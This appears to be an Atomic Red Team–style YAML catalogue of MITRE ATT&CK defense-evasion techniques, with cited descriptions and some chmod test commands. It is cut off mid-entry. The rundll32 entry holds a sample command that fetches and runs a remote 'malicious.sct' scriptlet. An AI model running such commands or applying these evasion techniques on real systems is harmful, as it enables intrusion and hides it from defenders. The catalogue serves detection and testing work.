--- defense-evasion: T1055.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298 created: '2020-01-14T17:18:32.126Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1055/011 external_id: T1055.011 - source_name: Microsoft Window Classes description: Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx - source_name: Microsoft GetWindowLong function description: Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx - source_name: Microsoft SetWindowLong function description: Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx - source_name: Elastic Process Injection July 2017 description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - source_name: MalwareTech Power Loader Aug 2013 description: MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017. url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html - source_name: WeLiveSecurity Gapz and Redyms Mar 2013 description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017. url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ - source_name: Microsoft SendNotifyMessage function description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:19.059Z' name: 'Process Injection: Extra Window Memory Injection' description: "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1055.011 atomic_tests: [] T1205.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520 created: '2022-09-30T21:18:41.930Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1205/002 external_id: T1205.002 - source_name: exatrack bpf filters passive backdoors description: 'ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.' url: https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - source_name: crowdstrike bpf socket filters description: 'Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.' url: https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/ - source_name: Leonardo Turla Penquin May 2020 description: Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021. url: https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf - source_name: haking9 libpcap network sniffing description: 'Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.' url: http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:19.274Z' name: Socket Filters description: |- Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020) Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tim (Wadhwa-)Brown - CrowdStrike x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1027.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939 created: '2023-03-23T19:55:25.546Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/011 external_id: T1027.011 - source_name: Aquasec Muhstik Malware 2024 description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message Queuing Services Applications. Retrieved September 24, 2024." url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/ - source_name: Bitsight 7777 Botnet description: Batista, João. Gi7w0rm. (2024, August 27). Retrieved June 5, 2025. url: https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet - source_name: CISCO Nexus 900 Config description: CISCO. (2021, September 14). Cisco Nexus 9000 Series NX-OS Fundamentals Configuration Guide, Release 7.x. Retrieved June 5, 2025. url: https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus9000/sw/7-x/fundamentals/configuration/guide/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x_chapter_01000.html - source_name: Elastic Binary Executed from Shared Memory Directory description: Elastic. (n.d.). Binary Executed from Shared Memory Directory. Retrieved September 24, 2024. url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html - source_name: SecureList Fileless description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware. Retrieved March 23, 2023. url: https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/ - source_name: Microsoft Fileless description: Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023. url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats - source_name: Sysdig Fileless Malware 23022 description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved September 24, 2024. url: https://sysdig.com/blog/containers-read-only-fileless-malware/ - source_name: Akami Frog4Shell 2024 description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet Adds One-Days to Its Arsenal. Retrieved September 24, 2024. url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-06-05T15:30:20.139Z' name: Fileless Storage description: "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Christopher Peacock - Denise Tan - Mark Wee - Simona David - Xavier Rousseau - Vito Alfano, Group-IB x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Linux x_mitre_version: '2.1' atomic_tests: [] T1218.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5 created: '2020-01-23T18:03:46.248Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/011 external_id: T1218.011 - source_name: rundll32.exe defense evasion description: Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022. url: https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/ - source_name: Attackify Rundll32.exe Obscurity description: Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. url: https://www.attackify.com/blog/rundll32_execution_order/ - source_name: This is Security Command Line Confusion description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. url: https://www.stormshield.com/news/poweliks-command-line-confusion/ - source_name: Github NoRunDll description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021. url: https://github.com/gtworek/PSBits/tree/master/NoRunDll - source_name: lolbas project Ieframe.dll description: lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025. url: https://lolbas-project.github.io/lolbas/Libraries/Ieframe/ - source_name: lolbas project Zipfldr.dll description: lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025. url: https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/ - source_name: Trend Micro CPL description: Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017. url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:20.567Z' name: 'Signed Binary Proxy Execution: Rundll32' description: "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" \ This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Gareth Phillips, Seek Ltd. - Casey Smith - Ricardo Dias - James_inthe_box, Me - Amir Hossein Vafifar x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.5' identifier: T1218.011 atomic_tests: [] T1027.009: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1 created: '2022-09-30T18:50:14.351Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/009 external_id: T1027.009 - source_name: GitHub PSImage description: Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022. url: https://github.com/peewpw/Invoke-PSImage - source_name: Malware Analysis Report ComRAT description: 'CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.' url: https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a - source_name: Trend Micro description: Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022. url: https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html - source_name: Securelist Dtrack2 description: KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022. url: https://securelist.com/my-name-is-dtrack/93338/ - source_name: Microsoft Learn description: Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022. url: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1 - source_name: SentinelLabs reversing run-only applescripts 2021 description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022. url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/ - source_name: Sentinel Labs description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022. url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:03.051Z' name: Embedded Payloads description: "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Nick Cairns, @grotezinfosec x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.2' atomic_tests: [] T1556.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771 created: '2020-06-26T04:01:09.648Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1556/003 external_id: T1556.003 - source_name: Apple PAM description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020. url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt - source_name: Man Pam_Unix description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020. url: https://linux.die.net/man/8/pam_unix - source_name: PAM Creds description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved November 17, 2024. url: https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ - source_name: Red Hat PAM description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020. url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules - source_name: PAM Backdoor description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020. url: https://github.com/zephrax/linux-pam-backdoor object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:21.118Z' name: 'Modify Authentication Process: Pluggable Authentication Modules' description: |- Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor) Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Scott Knight, @sdotknight, VMware Carbon Black - George Allen, VMware Carbon Black x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '2.1' identifier: T1556.003 atomic_tests: [] T1578.004: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1 created: '2020-06-16T18:42:20.734Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1578/004 external_id: T1578.004 - source_name: Tech Republic - Restore AWS Snapshots description: Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019. url: https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/ - source_name: Google - Restore Cloud Snapshot description: Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019. url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:21.210Z' name: Revert Cloud Instance description: |- An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Netskope x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.2' atomic_tests: [] T1564.012: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9 created: '2024-03-29T16:59:10.374Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/012 external_id: T1564.012 - source_name: Microsoft File Folder Exclusions description: Microsoft. (2024, February 27). Contextual file and folder exclusions. Retrieved March 29, 2024. url: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:35:31.731Z' name: File/Path Exclusions description: |- Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions) Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1222.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345 created: '2020-02-04T19:24:27.774Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1222/002 external_id: T1222.002 - source_name: Hybrid Analysis Icacls1 June 2018 description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - source_name: Hybrid Analysis Icacls2 May 2018 description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - source_name: 20 macOS Common Tools and Techniques description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:21.839Z' name: 'File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification' description: "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS - Linux x_mitre_version: '1.2' identifier: T1222.002 atomic_tests: - name: chmod - Change file or folder mode (numeric mode) auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. ' supported_platforms: - linux - macos input_arguments: numeric_mode: description: Specified numeric mode value type: integer default: 755 file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod #{numeric_mode} #{file_or_folder} ' name: sh - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. ' supported_platforms: - linux - macos input_arguments: symbolic_mode: description: Specified 